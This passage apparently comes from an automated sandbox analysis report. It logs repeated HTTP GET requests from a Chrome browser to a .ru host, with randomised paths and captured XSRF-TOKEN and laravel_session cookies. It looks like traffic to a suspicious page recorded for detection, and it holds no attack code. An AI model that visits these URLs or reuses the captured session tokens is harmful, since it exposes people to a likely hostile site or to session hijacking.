https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /sqpKuPasEkRjZVcYlD9tzoTs6U9MaxM01XQQUbYMcX05n1w HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /op9nJ96mWPUqO6569NQJB0Igha1bclYFfgOjFPonTi9mJHOHcd200 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; 